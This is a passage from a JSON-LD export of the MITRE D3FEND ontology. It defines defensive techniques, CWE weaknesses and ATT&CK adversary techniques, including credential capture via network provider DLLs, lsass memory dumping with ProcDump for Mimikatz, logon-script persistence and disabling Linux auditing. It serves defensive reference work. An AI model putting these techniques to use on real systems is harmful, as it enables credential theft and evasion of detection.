      "@id": "d3f:ElectromagneticRadiationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ElectromagneticRadiationHardening"
      ],
      "d3f:d3fend-id": "D3-EMH",
      "d3f:definition": "The application of physical and material-level design measures to electronic systems, components, or facilities to reduce their susceptibility to damage or disruption from electromagnetic threats.",
      "d3f:kb-article": "## How it works\nEM hardening operates on the principle of controlling the coupling path between an electromagnetic threat and the sensitive electronics it could affect. At the most fundamental level, this involves creating barriers that reflect, absorb, or redirect unwanted electromagnetic energy before it can induce damaging or disruptive currents in protected circuitry. The physical mechanisms exploited include the Faraday cage effect (conductive enclosures that attenuate external fields), skin-depth shielding (where conductive materials dissipate high-frequency fields before they penetrate), and transient suppression components (such as surge protectors and ferrite chokes) that clamp induced voltages at I/O interfaces.\n\nFor threats at higher energy levels or involving ionizing radiation, such as nuclear EMP (NEMP) or space radiation, hardening extends beyond shielding to encompass radiation-tolerant component selection, redundant circuit architectures, and layout practices that minimize antenna-like structures susceptible to field coupling. The approach is inherently defense-in-depth: no single measure provides complete protection, so hardened systems typically layer multiple techniques across the facility, chassis, board, and component levels.\n\n## Considerations\n* Threat scope must be defined early: design choices differ significantly between defending against ambient RFI, conducted EMI on power lines, intentional jamming, HEMP (High-Altitude EMP), or ionizing radiation in space or nuclear environments.\n* Hardening can conflict with thermal management: fully sealed enclosures that maximize shielding often restrict airflow, requiring careful thermal design trade-offs.\n* Testing and certification are mandatory for assurance: claimed shielding effectiveness must be validated through standardized testing (e.g., IEEE 299, MIL-STD-461) rather than inferred from design alone.\n* Maintenance can degrade hardening: field modifications, connector re-terminations, or enclosure repairs can inadvertently introduce shielding gaps, necessitating re-verification procedures.\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForProvidingCertifiableElectromagneticPulseAndRFIProtection_InstantAccessNetworksLLC"
      },
      "d3f:synonym": "EM Hardening",
      "rdfs:isDefinedBy": {
        "@id": "https://patents.google.com/patent/US20070105445A1"
      },
      "rdfs:label": "Electromagnetic Radiation Hardening",
      "rdfs:subClassOf": {
        "@id": "d3f:RadiationHardening"
      },
      "skos:altLabel": "Electromagnetic Hardening"
    },
    {
      "@id": "d3f:T1636.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.003",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather contact list data. On Android, this can be accomplished using the Contacts Content Provider. On iOS, this can be accomplished using the `Contacts` framework.",
      "rdfs:label": "Contact List - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "Contact List"
    },
    {
      "@id": "d3f:CWE-415",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-415",
      "d3f:definition": "The product calls free() twice on the same memory address.",
      "d3f:synonym": "Double-free",
      "d3f:weakness-of": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "rdfs:label": "Double Free",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1341"
        },
        {
          "@id": "d3f:CWE-666"
        },
        {
          "@id": "d3f:CWE-825"
        },
        {
          "@id": "_:N0eaa3150e0b74c369bd4f233a17214b3"
        }
      ]
    },
    {
      "@id": "_:N0eaa3150e0b74c369bd4f233a17214b3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:UseCaseStep",
      "@type": "owl:Class",
      "rdfs:label": "Use Case Step",
      "rdfs:subClassOf": {
        "@id": "d3f:Step"
      }
    },
    {
      "@id": "d3f:EmailEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving email communication, including sending, receiving, and processing emails. Email events encapsulate activities essential to the transmission and analysis of email messages in a networked environment.",
      "rdfs:label": "Email Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/email_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:N0519de053cbb41adad0b4e5d6c912d71"
        }
      ]
    },
    {
      "@id": "_:N0519de053cbb41adad0b4e5d6c912d71",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MailNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-002718_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileHashing"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to detect unauthorized changes to information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002718"
    },
    {
      "@id": "d3f:T1106",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1106",
      "d3f:definition": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Native API",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N147077d8d4864e7a8fd23b791af69b0f"
        }
      ]
    },
    {
      "@id": "_:N147077d8d4864e7a8fd23b791af69b0f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:EventLogDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that the event logging service has been disabled, preventing it from collecting or recording logs.",
      "rdfs:label": "Event Log Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLogEvent"
        },
        {
          "@id": "_:N2fd6d1d70c8a424d829c023efe860af1"
        }
      ]
    },
    {
      "@id": "_:N2fd6d1d70c8a424d829c023efe860af1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLogEnableEvent"
      }
    },
    {
      "@id": "d3f:ControlCorrelationIdentifierCatalog",
      "@type": "owl:Class",
      "d3f:definition": "A control correlation identifier (CCI) catalog provides a catalog of CCIs for a given release date.",
      "rdfs:label": "Control Correlation Identifier Catalog",
      "rdfs:seeAlso": {
        "@id": "https://public.cyber.mil/stigs/cci/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ControlCatalog"
        },
        {
          "@id": "_:Na9595b4a18394580b6c229535a472be8"
        }
      ]
    },
    {
      "@id": "_:Na9595b4a18394580b6c229535a472be8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-member"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CCIControl"
      }
    },
    {
      "@id": "d3f:LocalResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a system resource, or simply resource, is any physical or virtual component of limited availability within a computer system. Every device connected to a computer system is a resource. Every internal system component is a resource. Virtual system resources include files (concretely file handles), network connections (concretely network sockets), and memory areas. Managing resources is referred to as resource management, and includes both preventing resource leaks (releasing a resource when a process has finished using it) and dealing with resource contention (when multiple processes wish to access a limited resource).",
      "rdfs:label": "Local Resource",
      "rdfs:seeAlso": {
        "@id": "dbr:System_resource"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Resource"
      },
      "skos:altLabel": "System Resource"
    },
    {
      "@id": "d3f:T1480.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1480.001",
      "d3f:definition": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)",
      "rdfs:label": "Environmental Keying",
      "rdfs:subClassOf": {
        "@id": "d3f:T1480"
      }
    },
    {
      "@id": "d3f:CWE-836",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-836",
      "d3f:definition": "The product records password hashes in a data store, receives a hash of a password from a client, and compares the supplied hash to the hash obtained from the data store.",
      "rdfs:label": "Use of Password Hash Instead of Password for Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:DBSCAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DBS",
      "d3f:definition": "A density-based clustering algorithm that works on the assumption that clusters are dense regions in space separated by regions of lower density.",
      "d3f:kb-article": "## References\nAnalytics Vidhya. (2020, September 15). How DBSCAN Clustering Works: A Comprehensive Guide with Implementations in Python. [Link](https://www.analyticsvidhya.com/blog/2020/09/how-dbscan-clustering-works/#:~:text=DBSCAN%20is%20a%20density%2Dbased,points%20into%20a%20single%20cluster.)",
      "rdfs:label": "DBSCAN",
      "rdfs:subClassOf": {
        "@id": "d3f:Density-basedClustering"
      }
    },
    {
      "@id": "d3f:CWE-1095",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1095",
      "d3f:definition": "The product uses a loop with a control flow condition based on a value that is updated within the body of the loop.",
      "rdfs:label": "Loop Condition Value Update within the Loop",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:CWE-81",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-81",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters that could be interpreted as web-scripting elements when they are sent to an error page.",
      "rdfs:label": "Improper Neutralization of Script in an Error Message Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:T1582",
      "@type": "owl:Class",
      "d3f:attack-id": "T1582",
      "d3f:definition": "Adversaries may delete, alter, or send SMS messages without user authorization. This could be used to hide C2 SMS messages, spread malware, or various external effects.",
      "rdfs:label": "SMS Control - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "SMS Control"
    },
    {
      "@id": "d3f:CWE-1051",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1051",
      "d3f:definition": "The product initializes data using hard-coded values that act as network resource identifiers.",
      "rdfs:label": "Initialization with Hard-Coded Network Resource Configuration Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000016_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically removes or disables temporary accounts after an organization-defined time period for each type of account.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000016"
    },
    {
      "@id": "d3f:T1218.014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.014",
      "d3f:definition": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)",
      "d3f:executes": {
        "@id": "d3f:ShellCommand"
      },
      "d3f:may-add": {
        "@id": "d3f:Software"
      },
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "MMC",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:N33a9dad3379f46cc9b61dc49db3fabb2"
        },
        {
          "@id": "_:N2c2fb4856b584ba1b2af2ef610907217"
        },
        {
          "@id": "_:N1f82f2bcec3442b181735e288efa802d"
        }
      ]
    },
    {
      "@id": "_:N33a9dad3379f46cc9b61dc49db3fabb2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ShellCommand"
      }
    },
    {
      "@id": "_:N2c2fb4856b584ba1b2af2ef610907217",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "_:N1f82f2bcec3442b181735e288efa802d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:InboundNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Inbound traffic is network traffic originating from another host (client), to the host of interest (server).",
      "rdfs:label": "Inbound Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:DS0014",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A single unit of shared resources within a cluster, comprised of one or more containers",
      "rdfs:comment": "This data source captures events relating to pods and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Pod (ATT&CK DS)"
    },
    {
      "@id": "d3f:Grid-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GBC",
      "d3f:definition": "Divides the entire data space into a finite number of cells reducing the complexity of the data and focuses on the cells rather than the data.",
      "d3f:kb-article": "## References\nTechVidvan. (n.d.). Clustering in Machine Learning Tutorial. [Link](https://techvidvan.com/tutorials/clustering-in-machine-learning/)",
      "rdfs:label": "Grid-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:High-dimensionClustering"
      }
    },
    {
      "@id": "d3f:T1556.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.008",
      "d3f:definition": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify)",
      "rdfs:label": "Network Provider DLL",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:Reference-LsassProcessDumpViaProcdump_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-07-002/"
      },
      "d3f:kb-abstract": "ProcDump is a sysinternal command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.\n\nProcDump may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching procdump.exe as a privileged user with command line options indicating that lsass.exe should be dumped to a file with an arbitrary name.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-07-002: Lsass Process Dump via Procdump",
      "rdfs:label": "Reference - CAR-2019-07-002: Lsass Process Dump via Procdump - MITRE"
    },
    {
      "@id": "d3f:T1037.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.001",
      "d3f:definition": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\\Environment\\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)",
      "d3f:modifies": {
        "@id": "d3f:UserInitScript"
      },
      "rdfs:label": "Logon Script (Windows)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:N90d2d5dc07214b2d83f6d99e8090b4eb"
        }
      ]
    },
    {
      "@id": "_:N90d2d5dc07214b2d83f6d99e8090b4eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitScript"
      }
    },
    {
      "@id": "d3f:UnixLink",
      "@type": "owl:Class",
      "d3f:definition": "A Unix link is a file link in a Unix file system.",
      "rdfs:label": "Unix Link",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSystemLink"
      }
    },
    {
      "@id": "d3f:ApplicationRule",
      "@type": "owl:Class",
      "d3f:definition": "A configuration of an application which is used to apply logical or data processing functions to data processed by the application.",
      "rdfs:label": "Application Rule",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:T1213.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1213.003",
      "d3f:definition": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.",
      "d3f:reads": {
        "@id": "d3f:CodeRepository"
      },
      "rdfs:label": "Code Repositories",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1213"
        },
        {
          "@id": "_:N50b57e735b964c3fa34738970777edd2"
        }
      ]
    },
    {
      "@id": "_:N50b57e735b964c3fa34738970777edd2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CodeRepository"
      }
    },
    {
      "@id": "d3f:T1542.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.003",
      "d3f:definition": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootLoader"
        },
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:VolumeBootRecord"
        }
      ],
      "rdfs:label": "Bootkit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:Na6efbab55ef74dc4a8ad0b98bc5472d9"
        },
        {
          "@id": "_:Ne2ee1aeb753c4938a018d790bc20c006"
        },
        {
          "@id": "_:Nd98f088516a24b9f860580c796420a43"
        }
      ]
    },
    {
      "@id": "_:Na6efbab55ef74dc4a8ad0b98bc5472d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "_:Ne2ee1aeb753c4938a018d790bc20c006",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Nd98f088516a24b9f860580c796420a43",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VolumeBootRecord"
      }
    },
    {
      "@id": "d3f:T1562.012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.012",
      "d3f:definition": "Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.",
      "d3f:disables": {
        "@id": "d3f:KernelAPISensor"
      },
      "rdfs:label": "Disable or Modify Linux Audit System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N04cf252e66634465b7c790a5fe72b238"
        }
      ]
    },
    {
      "@id": "_:N04cf252e66634465b7c790a5fe72b238",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelAPISensor"
      }
    },
    {
      "@id": "d3f:T1601",
      "@type": "owl:Class",
      "d3f:attack-id": "T1601",
      "d3f:definition": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.",
      "rdfs:label": "Modify System Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:output-of",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x output-of y: An artifact x is output of an event y iff x must be present when y concludes, was absent in the same state when x began, and y counts as complete only when x is available at its end.",
      "rdfs:domain": {
        "@id": "d3f:Artifact"
      },
      "rdfs:label": "output-of",
      "rdfs:range": {
        "@id": "d3f:Event"
      },
      "rdfs:seeAlso": {
        "@id": "https://www.commoncoreontologies.org/ont00001816"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:participates-in"
      }
    },
    {
      "@id": "d3f:participates-in",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x participates-in y: The object x takes part in the event y, signifying that x contributes to or is affected by the event's occurrence in some way.",
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/BFO_0000056"
      },
      "rdfs:label": "participates-in",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1317",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1317",
      "d3f:definition": "The product uses a fabric bridge for transactions between two Intellectual Property (IP) blocks, but the bridge does not properly perform the expected privilege, identity, or other access control checks between those IP blocks.",
      "rdfs:label": "Improper Access Control in Fabric Bridge",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:SystemCallFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemCallFiltering"
      ],
      "d3f:d3fend-id": "D3-SCF",
      "d3f:definition": "Controlling access to local computer system resources with kernel-level capabilities.",
      "d3f:filters": {
        "@id": "d3f:SystemCall"
      },
      "d3f:isolates": {
        "@id": "d3f:Process"
      },
      "d3f:kb-article": "## How it works\nSystem call filtering uses a mandatory access control paradigm (that is, a non-discretionary access control) system because the rules and polices that determine access is determined by a security control authority and not distributed to local users. Access determinations are based on designed access control polices and are not based on local resource owner determinations.\n\nAccess is typically granted by defining sets of subjects and sets of objects. Subjects are the entities requesting access and objects are the resources that subjects are trying to access. Rules and policies are defined that associate subjects and object permissions and access controls.\n\n### Common implementations\n#### Security label access control\nA fine-grained form control is to apply security labels to individual resources, including processes, and the access control decisions are against a particular resource and a given user attempting to gain access. This type of control requires that the file system has built-in support for security labels.\n\nAccess controls are typically implemented through the use of label identifiers for every file system object. Identifier labels are applied to resources and users are assigned a similar access identifier. Users attempting to access a resource will result in the operating system performing an access control check. The access control check will compare the assigned user's credentials to that of the resource or object they are attempting to access.\n\nA security context is associated with resources and is used to determine assess. Typical basic access control elements include users, roles and types and together they form a security context which is the basis for the security labels.\n\nThis type of access control is what is employed in SELinux [2]. This form of security kernel access control is considered the most flexible implementation, but it also is the most complex to deploy across the enterprise. 
Where multiple virtual machines (VM) are run together this type of access control is typically employed to ensure true isolation of processes and VMs.\n\n#### File path level controls\nA less fine-grained form of mandatory access control is to apply security labels that allow for access control at the file path level.  Access control is filesystem agnostic and no relabeling of resources is required. Pathname access control usually seems more natural for implementation and corresponding access audits.\n\nThis type of system call filtering is what is employed in AppArmor [3]. AppArmor was developed to provide a simpler alternative method with much less management overhead. A simple access policy is maintained that defines path resource access rules. Access control attributes are typically associated with programs instead of users.\n\n\n## Considerations\nSome implementations of security label-based control contain complex rules set that are hard to verify and complex to maintain over time.\n\nInitial planning of access model and continuous monitoring of the available users, resources and object is necessary.\n\n## Implementations\n\n * Linux C-Groups, and policy engines like SELinux and AppArmor\n * Windows Mandatory Integrity Control introduced in Windows Vista\n\n\n### Citations\n1. [SELinux](https://selinuxproject.org/)\n2. [AppArmor](https://www.apparmor.net/)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AnalysisOfTheWindowsVistaSecurityModel_SymantecCorporation"
        },
        {
          "@id": "d3f:Reference-ArchitectureOfTransparentNetworkSecurityForApplicationContainers_NeuvectorInc"
        },
        {
          "@id": "d3f:Reference-OverviewOfTheSeccompSandbox"
        }
      ],
      "d3f:synonym": "System Call Control",
      "rdfs:label": "System Call Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N952284ca80fa46a2b7e480ac00b64b8f"
        },
        {
          "@id": "_:N18fc526a323746e094663049b81a1211"
        }
      ],
      "skos:altLabel": [
        "Mandatory Access Control",
        "System Call Mediation"
      ]
    },
    {
      "@id": "_:N952284ca80fa46a2b7e480ac00b64b8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "_:N18fc526a323746e094663049b81a1211",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-546",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-546",
      "d3f:definition": "The code contains comments that suggest the presence of bugs, incomplete functionality, or weaknesses.",
      "rdfs:label": "Suspicious Comment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:connects",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x connects y: The subject x joins system y by means of communication equipment (to some other system, typically the adversary-targeted host).",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01071413-v"
      },
      "rdfs:label": "connects",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:UncertaintySampling",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-US",
      "d3f:definition": "Makes the utility inversely proportional to the uncertainty of the model with respect to the sample and will work with any  model provided it can assess its uncertainty of a predection.",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog.  [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Uncertainty Sampling",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:Reference-ContentExtractorAndAnalysisSystem_Bit9Inc,CarbonBlackInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20070028110A1"
      },
      "d3f:kb-abstract": "A security system provides a defense from known and unknown viruses, worms, spyware, hackers, and unwanted software. The system can implement centralized policies that allow an administrator to approve, block, quarantine, and log file activities. The system can extract content of interest from a file container, repackage the content of interest as another valid file type, perform hashes on the content of interest, associate the hash of the container with the hash of the repackaged content, transfer the repackaged content, and store the hash with other security-related information.",
      "d3f:kb-author": "Todd Brennan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Bit 9 Inc, Carbon Black Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:kb-reference-title": "Content extractor and analysis system",
      "rdfs:label": "Reference - Content extractor and analysis system - Bit 9 Inc, Carbon Black Inc"
    },
    {
      "@id": "d3f:ATTACKICSTactic",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK ICS Tactic",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSThing"
      }
    },
    {
      "@id": "d3f:CWE-163",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-163",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Multiple Trailing Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-162"
      }
    },
    {
      "@id": "d3f:T1027.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1027.006",
      "d3f:creates": {
        "@id": "d3f:JavaScriptBlob"
      },
